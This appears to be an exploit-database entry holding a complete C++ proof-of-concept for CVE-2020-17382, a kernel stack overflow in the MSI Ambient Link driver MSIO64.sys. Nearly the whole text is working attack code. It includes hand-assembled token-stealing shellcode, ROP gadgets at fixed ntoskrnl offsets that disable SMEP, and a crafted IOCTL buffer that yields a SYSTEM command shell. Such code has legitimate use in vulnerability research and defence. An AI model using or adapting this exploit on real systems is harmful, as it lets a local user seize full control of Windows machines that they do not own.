MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation

2020-09-29
ID: 103342
CVE: None
Download vulnerable application: None
/*
Exploit Title: 
Date: 2020-09-24
Exploit Author: Matteo Malvica
Vendor Homepage: https://www.msi.com
Software Link: https://msi.gm/ABLTMNB
Driver: MSIO64.sys
SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD
Version: 1.0.0.8
Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406]
MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation
CVE: CVE-2020-17382
Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/
Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities
*/

#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>

#pragma warning( disable : 6387 )

VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) {
          // SHELLCODE FOR 1709
          BYTE token_steal[] =
          "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
          "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
          "\x4D\x8B\x88\xe8\x02\x00\x00"              // mov r9, [r8 + 2e8h]      ; ActiveProcessLinks list head
          "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
          //find_system_proc:
          "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
          "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
          "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
          "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
          "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
          //found_system:
          "\x48\x8B\x41\x70"                          // mov rax, [rcx + 70h]     ; Offset from ActiveProcessLinks to Token
          "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
          //find cmd
          "\x48\x8B\x51\xF8"                          // mov rdx, [rcx-8]         ;ActiveProcessLinks - 8 = UniqueProcessId
          "\x48\x81\xFA\x99\x99\x00\x00"              // cmp rdx, 0d54h           ;UniqueProcessId == ZZZZ? (PLACEHOLDER)
          "\x74\x05"                                  // jz found_cmd             ;YES - move on
          "\x48\x8B\x09"                              // mov rcx, [rcx]           ;NO - next entry in list
          "\xEB\xEE"                                  // jmp find_cmd             ;loop
          // found cmd
          "\x48\x89\x41\x70"                          // mov [rcx+70h], rax       ;copy SYSTEM token over top of this process's token
          "\x48\x31\xc9"                              // xor rcx rcx              ; clear some registers to avoid issues while unwinding the call stack
          "\x48\x31\xc0"                              // xor rax rax
          "\x48\x31\xf6"                              // xor rsi,rsi
          "\x48\x31\xff"                              // xor rdi, rdi
          "\x4D\x31\xC0"                              // xor r8, r8
          "\x48\xc7\xc1\xf8\x06\x15\x00"              // mov rcx, 0x1506f8        ; move original cr4 value into rcx
          "\xc3";                                     // ret                      ; RET

    token_steal[54] = pid;
    token_steal[55] = pid >> 8;

    LPVOID allocated_shellcode = VirtualAlloc(NULL,
        sizeof(token_steal),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memcpy(allocated_shellcode, token_steal, sizeof(token_steal));

    INT64 pop_rcx_offset = kernel_base + 0x15fc70;            // gadget 1 1709 - pop rcx ; ret
    INT64 mov_cr4_offset = kernel_base + 0x76a02;             // gadget 2 1709 - mov cr4, ecx ; ret
    INT64 wbindv_offset = kernel_base + 0x1175c0;;            // gadget 3 1709 - wbinvd; ret
    INT64 rcx_value = 0x506f8;                                // value we want placed in cr4 in order to disable SMEP
    INT64 rcx_old_value = 0x1506f8;                           // original cr4 value         
    INT64 ret = pop_rcx_offset + 1;                           // RET NOP

    puts("[+] SMEP disabled");
    
    BYTE  input_buff[136] = { 0 };
    memset(input_buff, '\x41', 64);
    memset(input_buff, '\x42', 8);                            // dummy RBP
    memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8);      // pop rcx
    memcpy(input_buff + 80, (PINT64)&rcx_value, 8);           // disable SMEP value
    memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8);      // mov cr4, rcx
    memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8);       // wbinvd; ret
    memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode
    memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8);     // mov cr4, rcx 
    memcpy(input_buff + 120, (PINT64)&ret, 8);                // RETNOP to restore the stack
    memcpy(input_buff + 128, (PINT64)&ret, 8);                // RETNOP to restore the stack

    printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode);

    DWORD lpBytesReturned = 0x0;
    BOOL triggerIOCTL = DeviceIoControl(hFile,
        IoControlCode,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &lpBytesReturned,
        NULL);

    if (!triggerIOCTL) {
        printf("[!] DeviceIoControl failed: %d\n", GetLastError());
    }
    else {
        puts("[+] SMEP re-enabled");
        puts("[+] Enjoy your SYSTEM shell\n");
    }

    system("start cmd.exe");
}

LPVOID GetBaseAddr(const char* drvname) {
    LPVOID drivers[1024];
    DWORD cbNeeded;
    int nDrivers, i = 0;

    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        char szDrivers[1024];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (strcmp(szDrivers, drvname) == 0) {
                    return drivers[i];
                }
            }
        }
    }
    return 0;
}

HANDLE GetDriverHandle() {
    HANDLE hMsio;

    hMsio = CreateFileA("\\\\.\\MsIo",
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hMsio == INVALID_HANDLE_VALUE) {
        printf("[-] Error obtaining an handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    return hMsio;
}

int main() {
    puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica");
    DWORD IoControlCode = 0x80102040;
    HANDLE hDevice = GetDriverHandle();
    INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe");
    DWORD pid = GetCurrentProcessId();

    eopMsio(hDevice, nt, pid, IoControlCode);

    return 0;
}
1-4-2 (www01)